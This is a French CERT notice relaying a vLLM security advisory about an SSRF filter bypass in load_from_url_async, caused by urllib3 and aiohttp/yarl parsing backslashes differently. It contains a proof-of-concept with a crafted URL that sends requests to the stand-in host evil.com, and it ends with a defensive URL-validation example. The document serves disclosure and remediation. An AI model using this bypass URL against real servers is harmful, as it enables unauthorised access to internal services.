=====================================================================
CERT-Renater Note d'Information No. 2026/VULN275
_____________________________________________________________________
DATE : 10/03/2026
HARDWARE PLATFORM(S): /
OPERATING SYSTEM(S): Systems running vllm (pip) versions prior to 0.17.0.
=====================================================================
https://github.com/vllm-project/vllm/security/advisories/GHSA-v359-jj2v-j536
_____________________________________________________________________

SSRF Protection Bypass in vLLM
Severity: Moderate
russellb published GHSA-v359-jj2v-j536 on Mar 9, 2026

Package: vllm (pip)
Affected versions: >=0.15.1
Patched versions: 0.17.0

Description

Summary

The SSRF protection fix for GHSA-qh4c-xf7m-gxfc can be bypassed in the load_from_url_async method because the validation layer and the actual HTTP client parse URLs differently.

Affected Component

File: vllm/connections.py
Function: load_from_url_async

Vulnerability Details

Root Cause

The SSRF fix uses urllib3.util.parse_url() to validate and extract the hostname from user-provided URLs. However, load_from_url_async uses aiohttp to make the actual HTTP requests, and aiohttp internally uses the yarl library for URL parsing. The two parsers handle backslash characters (\) differently:

Parser               | Input URL                      | Parsed Host | Parsed Path    | Behavior
---------------------|--------------------------------|-------------|----------------|------------------------------------------------------------
urllib3.parse_url()  | https://httpbin.org\@evil.com/ | httpbin.org | /%5C@evil.com/ | URL-encodes \ as %5C; treats \@evil.com/ as part of the path
yarl (via aiohttp)   | https://httpbin.org\@evil.com/ | evil.com    | /              | Treats \ as part of userinfo (user: httpbin.org\); the @ acts as the userinfo/host separator

Attack Scenario

    import asyncio

    import aiohttp
    import urllib3

    # Attacker provides this URL
    malicious_url = "https://httpbin.org\\@evil.com/"

    # 1. Validation layer (urllib3.parse_url)
    parsed = urllib3.util.parse_url(malicious_url)
    # parsed.host == "httpbin.org"  ✅ Passes validation

    # 2. Actual request (aiohttp with yarl)
    async def fetch():
        async with aiohttp.ClientSession() as session:
            async with session.get(malicious_url) as response:
                # Request actually goes to evil.com!  ❌ Bypass!
                return await response.read()

    asyncio.run(fetch())

Why This Happens

- yarl: interprets httpbin.org\ as the userinfo component and @ as the userinfo/host separator, so the URL is parsed as user=httpbin.org\, host=evil.com, path=/
- urllib3: URL-encodes the backslash as %5C, so \@evil.com/ becomes /%5C@evil.com/, which is treated as part of the path, leaving host=httpbin.org

This inconsistency allows an attacker to:
- bypass the hostname allowlist check
- access arbitrary internal/external services
- perform full SSRF attacks

Fixes #34743

Severity: Moderate, 5.4 / 10

CVSS v3 base metrics
  Attack vector:       Network
  Attack complexity:   Low
  Privileges required: Low
  User interaction:    None
  Scope:               Unchanged
  Confidentiality:     Low
  Integrity:           None
  Availability:        Low
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

CVE ID: CVE-2026-25960

Weaknesses: CWE-918

Credits
  @RacerZ-fighting (RacerZ-fighting) - Reporter
  @russellb (russellb) - Coordinator
  @DarkLight1337 (DarkLight1337) - Remediation reviewer
  @Isotr0py (Isotr0py) - Other

=========================================================
+ CERT-RENATER           | tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel       | fax : 01-53-94-20-41         +
+ 75013 Paris            | email:cert@support.renater.fr +
=========================================================
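As an added example (not part of the advisory above nor of vLLM's own code), one way to close the parser-disagreement class of bug described under "Why This Happens": reject any authority that two parsers could read differently (backslashes, userinfo, percent-encoding in the host part), and hand the HTTP client a URL rebuilt from the validated components instead of the raw user string. The allowlist and the helper names are assumptions for illustration; only the standard library is used.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist for the example; a real deployment would load its own.
ALLOWED_HOSTS = {"httpbin.org"}


class UrlRejected(ValueError):
    """Raised when a URL is rejected by the validator."""


def canonical_url(url: str) -> str:
    """Validate `url` and return a canonical form that is safe to pass to a client.

    The raw string is never forwarded: the caller gets a URL rebuilt from the
    validated scheme, host, port, path and query, so the hostname the client
    connects to is exactly the one that was checked.
    """
    if "\\" in url:
        raise UrlRejected("backslash in URL (parsers disagree on its meaning)")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise UrlRejected(f"unsupported scheme {parts.scheme!r}")
    # Userinfo and percent-encoding in the authority are the ambiguous cases.
    if "@" in parts.netloc or "%" in parts.netloc:
        raise UrlRejected("userinfo or encoded bytes in authority")
    host = parts.hostname  # lower-cased, brackets stripped for IPv6
    if not host or host not in ALLOWED_HOSTS:
        raise UrlRejected(f"host {host!r} not in allowlist")
    try:
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError as exc:
        raise UrlRejected("invalid port") from exc
    netloc = host if port is None else f"{host}:{port}"
    # Fragment is dropped: it is never sent to the server.
    return urlunsplit((parts.scheme, netloc, parts.path or "/", parts.query, ""))


def is_accepted(url: str) -> bool:
    """Convenience wrapper: True if `url` passes validation."""
    try:
        canonical_url(url)
        return True
    except UrlRejected:
        return False


if __name__ == "__main__":
    # The advisory's bypass URL is rejected before any client sees it.
    print(is_accepted("https://httpbin.org\\@evil.com/"))
```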